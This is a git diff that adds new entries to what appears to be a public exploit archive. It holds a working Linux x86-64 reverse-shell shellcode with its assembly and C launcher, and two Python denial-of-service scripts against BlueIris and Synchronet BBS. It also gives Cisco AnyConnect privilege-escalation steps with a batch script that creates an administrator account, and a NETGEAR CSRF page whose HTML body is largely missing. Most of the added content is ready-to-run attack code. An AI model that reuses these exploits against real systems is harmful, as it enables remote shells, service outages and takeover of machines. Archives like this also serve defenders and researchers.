diff --git a/files.csv b/files.csv
index 5338845f8..b363ee91b 100644
--- a/files.csv
+++ b/files.csv
@@ -5384,6 +5384,8 @@ id,file,description,date,author,platform,type,port
41434,platforms/multiple/dos/41434.html,"Google Chrome - 'layout' Out-of-Bounds Read",2017-02-22,"Google Security Research",multiple,dos,0
41454,platforms/windows/dos/41454.html,"Microsoft Edge and Internet Explorer - 'HandleColumnBreakOnColumnSpanningElement' Type Confusion",2017-02-24,"Google Security Research",windows,dos,0
41457,platforms/linux/dos/41457.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free PoC",2017-02-26,"Andrey Konovalov",linux,dos,0
+41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
+41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8820,6 +8822,7 @@ id,file,description,date,author,platform,type,port
41356,platforms/linux/local/41356.txt,"ntfs-3g - Unsanitized modprobe Environment Privilege Escalation",2017-02-14,"Google Security Research",linux,local,0
41435,platforms/linux/local/41435.txt,"Shutter 0.93.1 - Code Execution",2016-12-26,Prajith,linux,local,0
41458,platforms/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local,0
+41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15920,6 +15923,7 @@ id,file,description,date,author,platform,type,port
41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
+41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -37387,3 +37391,4 @@ id,file,description,date,author,platform,type,port
41465,platforms/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0
41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0
+41472,platforms/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps,0
diff --git a/platforms/hardware/webapps/41472.html b/platforms/hardware/webapps/41472.html
new file mode 100755
index 000000000..c30fe2053
--- /dev/null
+++ b/platforms/hardware/webapps/41472.html
@@ -0,0 +1,26 @@
+# Exploit Title: NETGEAR Firmware DGN2200v1/v2/v3/v4 CSRF which leads to RCE through CVE-2017-6334
+# Date: 2017-02-28
+# Exploit Author: SivertPL
+# Vendor Homepage: http://netgear.com/
+# Software Link: http://www.downloads.netgear.com/files/GDC/DGN2200/DGN2200%20Firmware%20Version%201.0.0.20%20-%20Initial%20Release%20(NA).zip
+# Version: 10.0.0.20 (initial) - 10.0.0.50 (latest, still 0-day!)
+# Tested on: DGN2200v1,v2,v3,v4
+
+# CVE: CVE-2017-6366
+
+A quite dangerous CSRF was discovered on all DGN2200 firmwares.
+When chained with either CVE-2017-6077 or CVE-2017-6334, allows for unauthenticated (sic!) RCE after tricking somebody logged in to the router to view a website.
+
+
+
+
netgear router CSRF
+
+
+
+
+
+
\ No newline at end of file
diff --git a/platforms/linux/shellcode/41477.c b/platforms/linux/shellcode/41477.c
new file mode 100755
index 000000000..0e831f79a
--- /dev/null
+++ b/platforms/linux/shellcode/41477.c
@@ -0,0 +1,80 @@
+/*
+ Title: Linux/x86-64 - Reverse TCP shellcode - 84 bytes
+ Author: Manuel Mancera (@sinkmanu)
+ Tested on: 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64
+GNU/Linux
+
+----------------- Assembly code -------------------
+
+section .text
+ global _start
+
+_start:
+ push 0x2d01a8c0 ; Address (192.168.1.45)
+ push word 0x5c11 ; Port (4444)
+ push word 2 ; Address family -
+AF_INET (0x2)
+ push 42 ; connect syscall
+ push byte 16 ; length
+ push byte 41 ; socket syscall
+ push byte 1 ; type - SOCK_STREAM (0x1)
+ push byte 2 ; family - AF_INET (0x2)
+
+ pop rdi ; family
+ pop rsi ; type
+ xor rdx, rdx ; protocol
+ pop rax ; socket syscall
+ syscall
+
+ mov rdi, rax ; sockfd
+ pop rdx ; length
+ pop rax ; connect syscall
+ mov rsi, rsp ; sockaddr
+ syscall
+
+ xor rsi, rsi
+loop:
+ mov al, 33
+ syscall
+ inc rsi
+ cmp rsi, 2
+ jle loop
+
+ xor rax, rax
+ mov rdi, 0x68732f6e69622f2f
+ xor rsi, rsi
+ push rsi
+ push rdi
+ mov rdi, rsp
+ xor rdx, rdx
+ mov al, 59
+ syscall
+
+
+---------------------------------------------------
+$ nasm -f elf64 reverse-tcp-shell.asm -o reverse-tcp-shell.o
+$ ld reverse-tcp-shell.o -o reverse-tcp-shell
+$ objdump -d ./reverse-tcp-shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2
+-d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/
+/\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
+"\x68\xc0\xa8\x01\x2d\x66\x68\x11\x5c\x66\x6a\x02\x6a\x2a\x6a\x10\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05"
+$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+$ ./shellcode
+Length: 84 bytes
+
+*/
+
+
+#include
+#include
+
+const char code[] = \
+"\x68\xc0\xa8\x01\x2d\x66\x68\x11\x5c\x66\x6a\x02\x6a\x2a\x6a\x10\x6a\x29\x6a\x01\x6a\x02\x5f\x5e\x48\x31\xd2\x58\x0f\x05\x48\x89\xc7\x5a\x58\x48\x89\xe6\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\x31\xf6\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
+
+int main()
+{
+ printf("Length: %d bytes\n", strlen(code));
+ (*(void(*)()) code)();
+ return 0;
+}
+
diff --git a/platforms/windows/dos/41474.py b/platforms/windows/dos/41474.py
new file mode 100755
index 000000000..369590be5
--- /dev/null
+++ b/platforms/windows/dos/41474.py
@@ -0,0 +1,31 @@
+import socket
+
+
+# Title: BlueIris - Denial of Service
+# Date: 2017-02-28
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: http://blueirissoftware.com/blueiris.exe
+# Version: 4.5.1.4
+# Tested on: Windows Server 2008 R2 Standard x64
+
+
+# Start this fake FTP server and create an FTP connection in the software. Use the "Test" button to trigger the vulnerability.
+
+buffer = "A"*5000
+port = 21
+s = socket.socket()
+ip = '0.0.0.0'
+s.bind((ip, port))
+s.listen(5)
+
+
+print 'Listening on FTP port: '+str(port)
+
+while True:
+ conn, addr = s.accept()
+ conn.send('220 '+buffer+'\r\n')
+ conn.recv(1024)
+ conn.send('250 '+buffer+'\r\n')
+ conn.close()
+
diff --git a/platforms/windows/dos/41475.py b/platforms/windows/dos/41475.py
new file mode 100755
index 000000000..54cc6f1bb
--- /dev/null
+++ b/platforms/windows/dos/41475.py
@@ -0,0 +1,82 @@
+# Exploit Title: Synchronet BBS 3.16c for Windows – Multiple vulnerabilities
+# Date: 2017-02-28
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: ftp://synchro.net/Synchronet/sbbs316c.zip
+# Version: 3.16c for Windows
+# Tested on: Windows 7 Pro SP1 x64, Windows Server 2008 R2 Standard x64
+# CVE : CVE-2017-6371
+
+import socket
+import time
+import sys
+
+try:
+ host = sys.argv[1]
+ port = 80
+except IndexError:
+ print "[+] Usage %s " % sys.argv[0]
+ sys.exit()
+
+
+exploit = "\x41"*4096
+
+buffer = "GET /index.ssjs HTTP/1.1\r\n"
+buffer+= "Host: 192.168.198.129\r\n"
+buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
+buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\
+r\n"
+buffer+="Accept-Language: en-US,en;q=0.5\r\n"
+buffer+="Accept-Encoding: gzip, deflate\r\n"
+buffer+="Referer: "+exploit+"\r\n"
+buffer+="Connection: keep-alive\r\n"
+buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
+buffer+="Content-Length: 5900\r\n\r\n"
+
+i = 1
+while i < 957:
+ try:
+ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ connect=s.connect((host,port))
+ print("[*] Try: "+str(i))
+ s.send(buffer)
+ s.close()
+ i=i+1
+ except:
+ print("[-] The service seems to be down\r\n")
+ break
+
+
+print("[i] Waiting a few seconds before starting a second attack.\r\n")
+time.sleep(25)
+print("[*] Second run to trigger the DoS")
+i = 1
+while i < 957:
+ try:
+ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ connect=s.connect((host,port))
+ print("[*] Try: "+str(i))
+ s.send(buffer)
+ s.close()
+ i=i+1
+ except:
+ print("[-] The service seems to be down.\r\n")
+ break
+
+print("[i] Wait before the final strike.\r\n")
+time.sleep(25)
+print("[*] Third run to trigger the DoS")
+i = 1
+while i < 957:
+ try:
+ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ connect=s.connect((host,port))
+ print("[*] Try: "+str(i))
+ s.send(buffer)
+ s.close()
+ i=i+1
+ except:
+ print("[-] The service seems to be down.\r\n")
+ print("[!] It can take a few seconds for the service to crash\r\n")
+ break
+
diff --git a/platforms/windows/local/41476.txt b/platforms/windows/local/41476.txt
new file mode 100755
index 000000000..f3c00359c
--- /dev/null
+++ b/platforms/windows/local/41476.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Cisco AnyConnect Start Before Logon (SBL) local privilege escalation. CVE-2017-3813
+# Date: 02/27/2017
+# Exploit Author: @Pcchillin
+# Software Link: http://www.cisco.com/c/en/us/support/security/anyconnect-secure-mobility-client/tsd-products-support-series-home.html
+# Version: 4.3.04027 and earlier
+# Tested on: Windows 10
+# CVE : CVE-2017-3813
+# Vendor ID : cisco-sa-20170208-anyconnect
+
+
+#Run CMD.EXE with system privileges
+1. Start Cisco anyconnect from logon screen.
+2. Once the Cisco app comes up (where you can select a profile and hit connect) hold CTRL and hit B.
+3. When the Cisco about window appears then select the URL at the bottom. This will open Internet Explorer or you can select Chrome if installed.
+4. Once Internet Explorer is started press CTRL-O, then select browse. Chrome press CTRL-O and explorer will open.
+5. You can then navigate to the C:\Windows\System32\ folder and find CMD.exe then right click and select RunAsAdministrator.
+
+
+#Run scripts from USB flash drive
+Follow steps from above and navigate to the flash drive right click and select run. You can also edit the document.
+Example bat script:
+Net user #USERNAME #PASSWORD /add
+Net localgroup administrators #USERNAME /add
+
+
+#Vendor link to advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170208-anyconnect
+#Twitter handle @pcchillin
\ No newline at end of file